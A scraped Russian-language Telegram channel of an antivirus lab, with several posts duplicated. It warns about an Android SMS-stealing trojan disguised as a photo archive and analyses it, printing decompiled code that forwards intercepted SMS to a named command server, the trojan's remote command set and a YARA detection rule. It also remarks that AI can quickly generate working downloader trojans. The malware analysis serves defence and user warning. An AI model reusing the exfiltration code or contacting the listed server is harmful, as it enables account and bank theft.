Будьте внимательны сами и расскажите своим близким. Злоумышленники под видом архива с фотографиями рассылают российским пользователем мессенджеров вредоносное приложение. Сообщение с вредоносным вложением может быть получено в том числе и от хорошо знакомых людей или родственников. Если пользователь установит его на свой смартфон, то злоумышленники смогут получать, читать, отправлять СМС-сообщения, получат доступ к контактам, смогут совершать звонки по мобильной связи. Это приведёт к краже аккаунтов, доступу к банковским счетам жертвы.
Расскажите близким людям, что, если вложение требует установки чего-то, а на устройстве появляются предупреждающие сообщения, как на скриншоте, то это вредоносная активность и устанавливать ничего не нужно.
Подробный анализ будет позже.
IP-адрес командного центра вредоносного приложения: 89.23.102.250
Общение с ним осуществляется по протоколу WebSocket
#offensive #malware #фишинг
Будьте внимательны сами и расскажите своим близким. Злоумышленники под видом архива с фотографиями рассылают российским пользователем мессенджеров вредоносное приложение. Сообщение с вредоносным вложением может быть получено в том числе и от хорошо знакомых людей или родственников. Если пользователь установит его на свой смартфон, то злоумышленники смогут получать, читать, отправлять СМС-сообщения, получат доступ к контактам, смогут совершать звонки по мобильной связи. Это приведёт к краже аккаунтов, доступу к банковским счетам жертвы.
Расскажите близким людям, что, если вложение требует установки чего-то, а на устройстве появляются предупреждающие сообщения, как на скриншоте, то это вредоносная активность и устанавливать ничего не нужно.
Подробный анализ будет позже.
IP-адрес командного центра вредоносного приложения: 89.23.102.250
Общение с ним осуществляется по протоколу WebSocket
#offensive #malware #фишинг
👍3😱1🤨1
Как и обещали, подробности по мошеннической активности, о которой говорили ранее.
Итак, если пользователь согласится установить вредоносное приложение, Android выведет список разрешений, необходимых этому приложению для работы. Среди них доступ к камере, доступ к контактам, доступ к файлам, доступ к микрофону, доступ к СМС.
После запуска приложение инициирует подключение к С2-серверу, IP-адрес которого – 89.23.102.250 (общение происходит по протоколу WebSocket), и отправляет ему 3 пакета с информацией об устройстве, в которую входят модель, версия Android, тип подключения, название и идентификаторы вредоносного приложения, номер телефона и оператор мобильной связи жертвы, сохранённые СМС-сообщения с мобильного телефона жертвы, список установленных приложений с версиями пакетов и иконками.
Четвёртый пакет содержит команду серверу:
На что сервер отвечает:
Далее вредоносное приложение переходит в режим ожидания, в котором получает Ping-пакет, отвечает на него Pong и отправляет пакет с информацией об устройстве, в которую входят модель, версия Android, тип подключения.
Загрузив зараженный apk-файл в декомпилятор и открыв файл «AndroidManifest.xml», мы увидим, что данное приложение требует доступ к конфиденциальной информации пользователя, а именно:
• Получение, чтение и отправка СМС
• Доступ к телефонным звонкам
Ресиверы СМС и ММС :
#offensive #malware #фишинг
Итак, если пользователь согласится установить вредоносное приложение, Android выведет список разрешений, необходимых этому приложению для работы. Среди них доступ к камере, доступ к контактам, доступ к файлам, доступ к микрофону, доступ к СМС.
После запуска приложение инициирует подключение к С2-серверу, IP-адрес которого – 89.23.102.250 (общение происходит по протоколу WebSocket), и отправляет ему 3 пакета с информацией об устройстве, в которую входят модель, версия Android, тип подключения, название и идентификаторы вредоносного приложения, номер телефона и оператор мобильной связи жертвы, сохранённые СМС-сообщения с мобильного телефона жертвы, список установленных приложений с версиями пакетов и иконками.
Четвёртый пакет содержит команду серверу:
{"action":"retransmission"}На что сервер отвечает:
{"action": "retransmission", "number": "NUMBER"}Далее вредоносное приложение переходит в режим ожидания, в котором получает Ping-пакет, отвечает на него Pong и отправляет пакет с информацией об устройстве, в которую входят модель, версия Android, тип подключения.
Загрузив зараженный apk-файл в декомпилятор и открыв файл «AndroidManifest.xml», мы увидим, что данное приложение требует доступ к конфиденциальной информации пользователя, а именно:
• Получение, чтение и отправка СМС
<uses-permission
name="android.permission.RECEIVE_SMS" />
<uses-permission
name="android.permission.READ_SMS" />
<uses-permission
name="android.permission.SEND_SMS" />
• Доступ к телефонным звонкам
<uses-permission
name="android.permission.READ_PHONE_STATE" />
<uses-permission
name="android.permission.READ_PHONE_NUMBERS" />
<uses-permission
name="android.permission.READ_CALL_LOG" />
<uses-permission
name="android.permission.CALL_PHONE" />
Ресиверы СМС и ММС :
android:name="ru.cvv.core.SMSBroadcastReceiver"
permission="android.permission.BROADCAST_SMS"
exported="true"
android:tag="⟨STRING_DECODE_ERROR⟩">
<intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
<action
android:name="android.provider.Telephony.SMS_RECEIVED"
android:tag="⟨STRING_DECODE_ERROR⟩"/>
<action
android:name="android.provider.Telephony.SMS_DELIVER"
android:tag="⟨STRING_DECODE_ERROR⟩"/>
</intent-filter>
android:name="ru.cvv.core.MmsReceiver"
permission="android.permission.BROADCAST_WAP_PUSH"
exported="true"
android:tag="⟨STRING_DECODE_ERROR⟩">
<intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
<action
android:name="android.provider.Telephony.WAP_PUSH_DELIVER"
android:tag="⟨STRING_DECODE_ERROR⟩"/>
<data
android:mimeType="application/vnd.wap.mms-message"
android:tag="⟨STRING_DECODE_ERROR⟩"/>
</intent-filter>
#offensive #malware #фишинг
👍1
Продолжение
SMS-ресивер используется для обработки полученного СМС-сообщения на смартфоне и отправки его на командный сервер. Нагрузка находится в методе onReceive() класса SMSBroadcastReceiver:
Объект а реализует отправку полученного сообщения на С2-сервер:
MMS-ресивер в исследуемой версии никак не реализован:
WS-сервис
WebSocketService
Класс WebSocketService создан незаметно работать в фоне. При инициализации вызывает функцию create_realwebsocket ()
которая создает объект RealWebSocket(). Также этот класс реализует сбор информации с устройства.
Класс RealWebSocket осуществляет общение с С2 по протоколу WebSocket. Он получает от сервера сообщения и может отправлять свои. В методе connect() происходит создание класса MyWebSocketListener и вызов метода init_MyWebSocketListener(). MyWebSocketListener используется для создания собранной информации с устройства в пакет и последующей отправки на сервер.
Команды сервера
В методе onReadMessage() класса RealWebSocket заданы команды, которые необходимо выполнить при получении той или иной команды:
• send_call – на указанный в поле «number» полученной команды будет произведен звонок
• retransmission – на номер телефона, указанного в поле «number» будет отправлена СМС с содержимым переменных: unique_id;;worker;;worker_id
• send_sms – на указанный в поле «number» телефонный номер будет отправлен текст, содержащийся в «message»
• get_message_history – на сервер отправляются СМС, сохраненные на телефоне
• get_perm_list – на сервер отправляется список разрешений приложения
• get_app_list – отправляются установленные приложения
• get_calls_history – на сервер отправляет история звонков
• get_sim_list – на сервер отправляются номер телефона и сотовый оператор
Выводы
Совершенно очевидно, что данный экземпляр вредоносного приложения далеко не единственный. Это следует хотя бы из наличия нескольких идентификаторов вредоносной сборки, которая отправляется во втором пакете при старте вредоносного приложения:
• unique_id - уникальный id
• current_app - информация о текущем приложении:
◦ app_name
◦ worker
◦ worker_id
◦ webview_url
◦ build_type
Об этом же свидетельствует и наличие единcтвенного IP-адреса в экземпляре вредоноса: злоумышленники не хотят "палить" несколько серверов сразу. Им проще потерять один из C2-серверов вместе с привязанными к нему приложениями. Это говорит и о времени жизни атаки с использованием данного конкретного экземпляра вредоноса: оно невелико. Но экземпляров, судя по всему, немало, как и C2-серверов
#offensive #malware #фишинг
SMS-ресивер используется для обработки полученного СМС-сообщения на смартфоне и отправки его на командный сервер. Нагрузка находится в методе onReceive() класса SMSBroadcastReceiver:
. . .
new Thread(new a(i4, displayOriginatingAddress, sb2)).start(); // <- нагрузка
ContentValues contentValues = new ContentValues();
contentValues.put("address", displayOriginatingAddress);
contentValues.put("body", sb2);
contentValues.put("type", (Integer) 1);
contentValues.put("date", Long.valueOf(System.currentTimeMillis()));
. . .
Объект а реализует отправку полученного сообщения на С2-сервер:
. . .
if (MyWebSocketListener.f3863f != null) {
JSONObject jSONObject = new JSONObject();
jSONObject.put("action", "incoming");
jSONObject.put("sender", str);
jSONObject.put("body", str2);
jSONObject.put("subscription_id", i4);
MyWebSocketListener.f3863f.send(jSONObject.toString());
break;
MMS-ресивер в исследуемой версии никак не реализован:
public final void onReceive(Context context, Intent intent) {}WS-сервис
<service
name="ru.cvv.core.WebSocketService"
exported="false"
android:foregroundServiceType="dataSync"
android:tag="⟨STRING_DECODE_ERROR⟩"/>
WebSocketService
Класс WebSocketService создан незаметно работать в фоне. При инициализации вызывает функцию create_realwebsocket ()
public final int onStartCommand(Intent intent, int i3, int i4) {
Log.d("WebSocketService", "Service onStartCommand");
. . .
create_realwebsocket();
return 1;
}которая создает объект RealWebSocket(). Также этот класс реализует сбор информации с устройства.
Класс RealWebSocket осуществляет общение с С2 по протоколу WebSocket. Он получает от сервера сообщения и может отправлять свои. В методе connect() происходит создание класса MyWebSocketListener и вызов метода init_MyWebSocketListener(). MyWebSocketListener используется для создания собранной информации с устройства в пакет и последующей отправки на сервер.
Команды сервера
В методе onReadMessage() класса RealWebSocket заданы команды, которые необходимо выполнить при получении той или иной команды:
• send_call – на указанный в поле «number» полученной команды будет произведен звонок
• retransmission – на номер телефона, указанного в поле «number» будет отправлена СМС с содержимым переменных: unique_id;;worker;;worker_id
• send_sms – на указанный в поле «number» телефонный номер будет отправлен текст, содержащийся в «message»
• get_message_history – на сервер отправляются СМС, сохраненные на телефоне
• get_perm_list – на сервер отправляется список разрешений приложения
• get_app_list – отправляются установленные приложения
• get_calls_history – на сервер отправляет история звонков
• get_sim_list – на сервер отправляются номер телефона и сотовый оператор
Выводы
Совершенно очевидно, что данный экземпляр вредоносного приложения далеко не единственный. Это следует хотя бы из наличия нескольких идентификаторов вредоносной сборки, которая отправляется во втором пакете при старте вредоносного приложения:
• unique_id - уникальный id
• current_app - информация о текущем приложении:
◦ app_name
◦ worker
◦ worker_id
◦ webview_url
◦ build_type
Об этом же свидетельствует и наличие единcтвенного IP-адреса в экземпляре вредоноса: злоумышленники не хотят "палить" несколько серверов сразу. Им проще потерять один из C2-серверов вместе с привязанными к нему приложениями. Это говорит и о времени жизни атаки с использованием данного конкретного экземпляра вредоноса: оно невелико. Но экземпляров, судя по всему, немало, как и C2-серверов
#offensive #malware #фишинг
Telegram
Рекриптор
Мошенническая активность
Будьте внимательны сами и расскажите своим близким. Злоумышленники под видом архива с фотографиями рассылают российским пользователем мессенджеров вредоносное приложение. Сообщение с вредоносным вложением может быть получено в том…
Будьте внимательны сами и расскажите своим близким. Злоумышленники под видом архива с фотографиями рассылают российским пользователем мессенджеров вредоносное приложение. Сообщение с вредоносным вложением может быть получено в том…
👍3
Были запросы хэша этого вредоноса. Ниже yara-правило. Хэш там тоже есть
#malware #offensive
import "hash"
rule photo_archive : banker {
meta:
author = "re-crypt"
strings:
$pk = { 50 4B }
$package_name = "ru.cvv.core" wide ascii
$str = "HIDDEN SMS " ascii
$apk_sig_v2 = {B4 80 8D D4 CF E0 37 7F 88 6F 7D 5E 6F 8E 8F 9D 39 B6 BD DF 09 11 A2 D0 BE 75 DC 67 8B 71 3E A5 0F 5C 3C AD BD 28 2D 67 6C A6 93 D4 1A 47 78 0A51 9F B6 69 83 F1 8B 9A 71 73 CA A2 E9 ED 04 20 15 63 BC 92 B5 58 77 B7 30 BF 1A A1 93 C2 EE 18 A9 95 77 7C B7 90 5B 6F 2B DF E4 DE 0D F1 33 25 56 17 1B A6 2E A8 4B 69 63 08 5E EB 4F A2 DE 01 A6 54 71 84 03 BB 06 50 15 EC 92 5A AA 7C EA 6C A7 35 21 37 22 74 C1 33 0F D8 B9 EE 9A 5C 29 D2 FC 5E 02 28 C2 A9 CA F1 AF 35 FD 37 A3 D4 97 10 9C FC 01 19 75 93 48 6B 6F 3D B8 CD 8B 9B E1 1E DB 8B 95 88 E1 09 D6 87 31 92 0C 92 50 BB 03 E6 62 18 47 48 B2 0F 4A 7B 82 44 ED 63 99 0B 9A C3 75 80 A7 02 DF 2A BE C1 4A E5 4A 0F 96 D5 19 F5 EF 66 A3 95 CC 8E B9 C6 9D 09 EF 13 EA 41 46 04 89 C0 69 0D 8D 72 7E 4C 9A BD 04 FB DA C3 F2 3D }
$apk_sig_v3 = {2F FF C8 AF 00 70 ED A0 90 B3 1D FC 5D FF 59 EC B8 F6 6A 0E 68 B4 E8 D5 92 6F 1E F7 44 A6 F5 51 C0 E0 BD 46 CC 7E 6F 9C 40 12 7F ED D3 CB 4D B6 0E BA B3 83 4C D5 3B 5B BD DF 60 FB C7 E9 B8 D5 E7 81 63 D0 6F BC 07 2D 79 A1 84 60 40 53 85 97 83 04 54 68 C0 AA B1 5B 4D 0E DC 29 32 63 D4 36 E5 DB 58 A7 0A A9 F0 3C 53 87 65 1C 81 F5 22 8E 9B 5C 6D FB F0 CF 24 36 98 B9 C8 D6 6B 88 DB 53 D2 35 CE 17 83 5C AF 86 0E 41 6D 9C C5 F6 09 18 EF DC 7C 4D 4B 28 3E E8 31 4B 9F 20 55 63 5A 2F FE 81 03 E3 26 DA 1F 74 80 61 83 5F 8B D2 CA FD 5A 18 99 78 BE B7 6C CC 56 F9 5A 4C 86 71 4A B9 67 1B A5 3D E0 74 02 49 32 AC 89 D9 CA 9B A3 60 BE 78 7A 19 26 77 0E EF B7 E8 88 5C A9 EA 52 E8 69 FB 8E 13 1D 51 BB 70 5E BD DE 9B 37 77 DC 9A 2C E1 E1 E9 7D 01 3F 9C 80 D9 E8 20 FC 16 7C 82}
condition:
($pk at 0 and 2) and
(hash.sha256(0,filesize) == "8b075beae0b294b158fcea470a28c72378c32e217c5548fdcce1fbc152a396c5" or
($package_name and
$str and
$apk_sig_v2 and
$apk_sig_v3))
}
#malware #offensive
Telegram
Рекриптор
Мошенническая активность
Будьте внимательны сами и расскажите своим близким. Злоумышленники под видом архива с фотографиями рассылают российским пользователем мессенджеров вредоносное приложение. Сообщение с вредоносным вложением может быть получено в том…
Будьте внимательны сами и расскажите своим близким. Злоумышленники под видом архива с фотографиями рассылают российским пользователем мессенджеров вредоносное приложение. Сообщение с вредоносным вложением может быть получено в том…
👍4
Про DeepSeek
Все побежали - и я побежал (c)
Раз все (ну почти) пишут про DeepSeek, мы тоже напишем. Нам интересно порассуждать, как повлияет его появление на ИБ. Тему эту мы буквально вчера в разных узких кругах затрагивали несколько раз. Тема актуальная. Лично я считаю, всё уже случилось: сильный генеративный ИИ уже давно оказывает влияние на ИБ. Сейчас появился ещё один довольно крутой и, самое главное, доступный инструмент, который несколько лучше, на мой субъективный взгляд, чем GPT-4. Его появление ускорит уже идущие трансформации, основной тренд которых - максимальная автоматизация с одновременным ускорением всех процессов.
Если говорить про offensive security, то это автоматизация поиска уязвимостей, проникновения, закрепления, дальнейшего продвижения, получения доступа, автоматическое генерирование эксплоитов, нагрузок, троянских программ, парсеров данных и т.д. Список далеко не полный, но масштаб понятен. То, что до появления GPT-моделей делалось за дни, теперь занимает минуты. Сгенерировать заобфусцированный троян с возможностью скачивания нагрузки, проверки её подлинности и запуска на исполнение, например, на Python - 50 секунд. И он вполне работоспособен. Злоумышленников не сковывают нормы регуляторов и прочие подобные ограничения, поэтому технологии ИИ внедряются ими максимально широко и эффективно. Это уже происходит. Мы об этом много писали. Можно найти по тэгам #ии #offensive
В защите ИИ внедряется для выявления аномалий (это тоже уже давно с переменным успехом, но сейчас идёт уверенный рост) в анализируемых объектах и в их поведении, при анализе вредоносной активности и вредоносных сущностей. Автоматизируется солидная часть работы вирусных аналитиков, сотрудников SOC-центров. Мы писали об этом. Разработчики средств защиты тоже используют кодогенерацию с помощью ИИ. Это уже норма. Но, в силу организационных причин, их код внедряется не так быстро. Это может привести к запоздалым реакциям на угрозы.
Так сложилось исторически, что мы изначально при создании нашей антивирусной лаборатории сделали ставку на ИИ и максимальную автоматизацию нашей деятельности. Мы используем несколько разных моделей разной сложности, включая локально развёрнутые большие языковые модели (LLM). Часть моделей мы разработали и обучили сами. Продолжаем их совершенствовать и разрабатывать новые. Вся деятельность компании Рекрипт пронизана ИИ: от видеоаналитики до кодогенерации и анализа вредоносов. Здесь хочется сказать огромное спасибо нашим друзьям и партнёрам - компании HPC Park - за предоставленные мощности и безупречный сервис.
#ии
Все побежали - и я побежал (c)
Раз все (ну почти) пишут про DeepSeek, мы тоже напишем. Нам интересно порассуждать, как повлияет его появление на ИБ. Тему эту мы буквально вчера в разных узких кругах затрагивали несколько раз. Тема актуальная. Лично я считаю, всё уже случилось: сильный генеративный ИИ уже давно оказывает влияние на ИБ. Сейчас появился ещё один довольно крутой и, самое главное, доступный инструмент, который несколько лучше, на мой субъективный взгляд, чем GPT-4. Его появление ускорит уже идущие трансформации, основной тренд которых - максимальная автоматизация с одновременным ускорением всех процессов.
Если говорить про offensive security, то это автоматизация поиска уязвимостей, проникновения, закрепления, дальнейшего продвижения, получения доступа, автоматическое генерирование эксплоитов, нагрузок, троянских программ, парсеров данных и т.д. Список далеко не полный, но масштаб понятен. То, что до появления GPT-моделей делалось за дни, теперь занимает минуты. Сгенерировать заобфусцированный троян с возможностью скачивания нагрузки, проверки её подлинности и запуска на исполнение, например, на Python - 50 секунд. И он вполне работоспособен. Злоумышленников не сковывают нормы регуляторов и прочие подобные ограничения, поэтому технологии ИИ внедряются ими максимально широко и эффективно. Это уже происходит. Мы об этом много писали. Можно найти по тэгам #ии #offensive
В защите ИИ внедряется для выявления аномалий (это тоже уже давно с переменным успехом, но сейчас идёт уверенный рост) в анализируемых объектах и в их поведении, при анализе вредоносной активности и вредоносных сущностей. Автоматизируется солидная часть работы вирусных аналитиков, сотрудников SOC-центров. Мы писали об этом. Разработчики средств защиты тоже используют кодогенерацию с помощью ИИ. Это уже норма. Но, в силу организационных причин, их код внедряется не так быстро. Это может привести к запоздалым реакциям на угрозы.
Так сложилось исторически, что мы изначально при создании нашей антивирусной лаборатории сделали ставку на ИИ и максимальную автоматизацию нашей деятельности. Мы используем несколько разных моделей разной сложности, включая локально развёрнутые большие языковые модели (LLM). Часть моделей мы разработали и обучили сами. Продолжаем их совершенствовать и разрабатывать новые. Вся деятельность компании Рекрипт пронизана ИИ: от видеоаналитики до кодогенерации и анализа вредоносов. Здесь хочется сказать огромное спасибо нашим друзьям и партнёрам - компании HPC Park - за предоставленные мощности и безупречный сервис.
#ии
Telegram
Рекриптор
Давно ожидаемое в том числе и нами набирает обороты. В отрасли ИБ тоже. Дальше будет веселее. Уже сейчас некоторые модели неплохо справляются в том числе с задачами реверсинга и поиска уязвимостей. Всё, что можно автоматизировать, будет автоматизировано.…
👍9🔥4👏1
Приехала в бумажном виде. Так читать всё-таки удобнее. Книга довольно содержательная и даёт ответы на вопросы "Почему именно так, а не иначе". Это тот самый вероятностный подход к машинному обучению. Фраза "машинное обучение " не должна смущать. В книге детально рассмотрены и трансформеры, и GPT: обоснование создания этих моделей. Есть довольно подробные главы, посвящённые сугубо теории вероятности, статистике, теории информации, линейной алгебре с упором на применение этих дисциплин в машинном обучении. В общем, рекомендуем к прочтению
#ии #почитать
#ии #почитать